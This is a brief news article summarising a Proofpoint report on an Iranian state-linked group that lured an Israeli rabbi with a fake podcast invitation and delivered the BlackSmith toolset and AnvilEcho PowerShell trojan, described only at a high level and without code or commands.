This post is also available in:
עברית (Hebrew)
Amidst increasing tensions between Israel and Iran, a religious figure in Israel was recently targeted by a known Iranian hacker, notorious for elaborate spear-phishing campaigns. This attack involved an elaborate setup where the attacker invited the rabbi to participate in a podcast discussing “Jewish life in the Muslim world.”
Researchers from Proofpoint have identified this latest campaign, conducted by the group under various aliases including TA453, APT42, Charming Kitten, Yellow Garuda, and ITG18. The threat actors employed a sophisticated new malware toolkit named BlackSmith, which delivers a PowerShell trojan known as AnvilEcho, according to Cyber News.
On July 22, 2024, the attackers sent a seemingly innocuous email to the rabbi, masquerading as a podcast host and research director for the Institute for the Study of War (ISW). The hackers’ MO was to make the rabbi trust them over a series of email exchanges. At the beginning, they created a deceptive website with the domain understandingthewar[.]org, in order to bolster their credibility. However, the real objective was to trick the rabbi into clicking the malicious link.
According to a report by Proofpoint, once the target responded, TA453 sent a DocSend URL—a service for secure document sharing—that was password protected. This link led to a text file containing a URL to the genuine ISW podcast, which the attackers were pretending to be. This tactic was designed to normalize the process of clicking on links and entering passwords, preparing the target for the actual malware delivery.
In Subsequent interactions, the hackers sent a Google Drive URL containing a ZIP file named “Podcast Plan-2024.zip.” This ZIP file contained an LNK file labeled “Podcast Plan 2024.lnk,” which was concealed behind a decoy PDF. The LNK file was used to deploy the BlackSmith toolset, that loaded the AnvilEcho PowerShell Trojan.
Proofpoint researchers observed that TA453 attempts to evade detection by complicating the infection chain and combining multiple malicious functions into a single PowerShell script. The malware is tailored for intelligence collection and data exfiltration, often utilizing legitimate services like Dropbox for these activities.
It is important to be aware of the sophisticated ways Iranian hackers target Israelis and employ precautions.
